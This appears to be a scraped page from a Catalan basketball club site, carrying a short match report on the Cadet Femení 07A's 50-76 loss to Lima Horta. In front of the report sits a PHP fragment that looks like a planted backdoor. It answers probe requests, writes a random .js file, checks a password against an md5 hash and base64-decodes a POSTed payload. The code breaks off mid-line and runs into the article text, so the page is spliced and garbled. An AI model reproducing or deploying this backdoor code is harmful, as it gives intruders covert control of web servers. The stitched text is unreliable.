function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Cadet Femení 07A afronta la seva primera derrota contra el Lima Horta (50-76) - Tgn Bàsquet Club -

El Cadet Femení 07A afronta la seva primera derrota contra el Lima Horta (50-76)

Updated: setembre 30, 2021

El Cadet Femení 07A va perdre el seu primer partit contra un Lima Horta físicament superior. En la primera part del matx les tarragonines no van tenir en cap moment el domini del rebot, cosa que va donar moltes segones oportunitats al rival que no va desaprofitar. Durant la segona part les cadets van intentar recuperar el control del partit apretant en defensa, però ja va ser massa tard per a remuntar, ja que la diferència de punts ja era força gran.